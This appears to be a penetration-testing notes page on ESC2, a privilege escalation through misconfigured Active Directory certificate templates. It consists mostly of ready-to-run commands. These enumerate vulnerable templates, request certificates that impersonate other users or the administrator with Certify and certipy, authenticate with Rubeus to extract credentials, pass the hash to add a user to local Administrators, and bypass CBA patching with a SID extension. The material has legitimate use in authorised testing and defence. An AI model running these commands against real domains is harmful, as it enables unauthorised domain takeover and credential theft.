Skip to main content

ESC2

This privilege escalation technique requires the following:

  • Any Purpose EKU which allows the attacker to get a certificate that can be used for all purposes (Client Authentication, Code Signing, ...)
  • ENROLLEE_SUPPLIES_SUBJECT attribute enabled
  • a user with enrollment rights

To make it easier to remember, the only difference between ESC1 and ESC2 is the require EKU. If, for some reason, a certificate template is configured with no EKU, we will be able to use it just like a template with Any Purpose EKU.

Windows

Enumerate ESC2 vulnerability

PS /home/bobbuilder> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=local,DC=lab'

Requesting a certificate

PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.minions.com\CA-SERVER<ca_name> /template:Template2<template_name> /altname:user1@minions.com

Convert Certificate

Certificate Authentication

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1 /certificate:cert.pfx /getcredentials /nowrap

PassTheHash using Invoke-TheHash

PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> cd .\Invoke-TheHash\;Import-Module .\Invoke-TheHash.psm1
PS /home/bobbuilder> Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash your_hash -Command "net localgroup Administrators user2 /add"

Linux

Certificate Request with alternative SAN

bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca CA-Server.minions.com<ca_name> -template Template2<template_name> -upn user1

Certificate Authentication

bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip>

Verify

bob$ KRB5CCNAME=administrator.ccache smbexec.py -k -no-pass CA-Server.minions.com

ESC2 in CBA-Patched Environments

Once again, if working in a CBA-patched environment we can use Certify's (or Ceritipy's) sidextension argument

PS /home/otter> .\Certify.exe request /ca:minions.com\CA-minions<ca_name> /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com